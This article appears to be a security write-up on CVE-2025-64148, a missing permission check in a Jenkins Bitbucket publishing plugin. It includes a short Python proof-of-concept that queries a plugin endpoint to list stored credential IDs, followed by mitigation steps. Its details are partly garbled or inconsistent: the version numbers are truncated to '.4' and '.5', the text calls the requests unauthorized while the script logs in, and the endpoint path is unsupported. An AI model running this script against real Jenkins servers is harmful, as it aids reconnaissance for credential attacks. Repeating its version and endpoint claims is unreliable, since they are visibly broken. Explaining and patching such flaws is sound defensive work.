CVE-2025-64148 is a recently discovered security vulnerability in the Jenkins Publish to Bitbucket Plugin, affecting version .4 and earlier. This flaw arises from a missing permission check, enabling attackers with minimal privileges (just Overall/Read permission) to enumerate the IDs of credentials stored in Jenkins. While credentials IDs alone are not passwords or secrets, enumerating them can be leveraged in further attacks, including credential stuffing, phishing, or privilege escalation in Jenkins environments.
This article walks you through CVE-2025-64148: what it is, how it may be exploited, code snippets, and protections you can apply right now.
What is Jenkins Publish to Bitbucket Plugin?
The Jenkins Publish to Bitbucket Plugin automates publishing build artifacts or other files to Bitbucket from a Jenkins job. Typically, this process requires credentials—like API keys, user/password, or tokens—stored securely in the Jenkins credentials store. Plugins like this should carefully check permissions before exposing any information about stored credentials.
The Issue
Jenkins access control divides permissions into fine-grained categories. Overall/Read is the very basic level: any logged-in user on a Jenkins instance typically has this by default. The plugin, however, fails to verify if the caller has credentials/use permissions before providing a list of credentials IDs—information not meant for low-privileged users.
What’s the Risk?
- Enumeration: Attackers can view the IDs of credentials, which may include descriptive names or other information useful for crafting targeted attacks.
- Social Engineering: Knowing the names or purposes of credentials, attackers may launch convincing phishing attempts.
- Preparation for Further Exploits: With credential IDs, attackers might attempt to use other flaws to read the actual secret values.
How the Exploit Works
The endpoint exposed by the plugin responds to unauthorized requests with a list of all available credentials IDs.
Sample Exploit Code (Python 3)
This script demonstrates how an attacker with valid Jenkins login and Overall/Read access can harvest credentials IDs from a vulnerable Jenkins instance:
import requests
from requests.auth import HTTPBasicAuth

# Placeholders: the target Jenkins base URL, a low-privileged account
# (Overall/Read is enough) and the job whose plugin form endpoint is queried.
JENKINS_URL = 'http://your-jenkins.local'
USERNAME = 'lowprivuser'
PASSWORD = 'password'
PLUGINS_ENDPOINT = '/jenkins/job/your-job/publishBitbucket/credentials'

def get_credentials_ids():
    url = JENKINS_URL + PLUGINS_ENDPOINT
    resp = requests.get(url, auth=HTTPBasicAuth(USERNAME, PASSWORD))
    if resp.status_code == 200:
        print("Credentials IDs found:")
        print(resp.text)  # Output may be in JSON or HTML, depending on the plugin version
    else:
        print("Failed to access credentials endpoint. Status code:", resp.status_code)

if __name__ == '__main__':
    get_credentials_ids()
Note: Replace the placeholders with valid values for your Jenkins setup.
Suppose the vulnerable endpoint returns something like
[
{"id": "dev-bitbucket-token", "description": "Developer Bitbucket API token"},
{"id": "deploy-prod", "description": "Production deploy credentials"}
]
Here, you’ve just learned the IDs and purpose of each credential on the system!
Responsible Disclosure and References
This vulnerability was responsibly disclosed to the Jenkins security team and has been tracked as CVE-2025-64148.
- Original Jenkins Security Advisory
- NVD CVE-2025-64148 Entry
- Publish to Bitbucket Plugin Page
Mitigation
Patch Immediately:
Upgrade the Publish to Bitbucket Plugin to the latest available version (.5 or above). The maintainers have added proper permission checks to prevent unauthorized disclosure of credential IDs.
Reduce Exposed Permissions:
Until you're able to update, restrict access to Jenkins and limit what even authenticated users can see.
Audit Credential Usage:
Review and rename credentials to avoid revealing sensitive details in IDs or descriptions.
Conclusion
*CVE-2025-64148* reminds us that even minor oversights—like missing a permission check—can open doors for attackers to gather valuable intelligence in your CI/CD infrastructure. Keeping Jenkins and its plugins updated, alongside routine access audits, will help you keep your automation environment safe.
Do you run Jenkins? Update now and check your plugin settings!
Timeline
Published on: 10/29/2025 13:29:51 UTC
Last modified on: 11/04/2025 22:16:41 UTC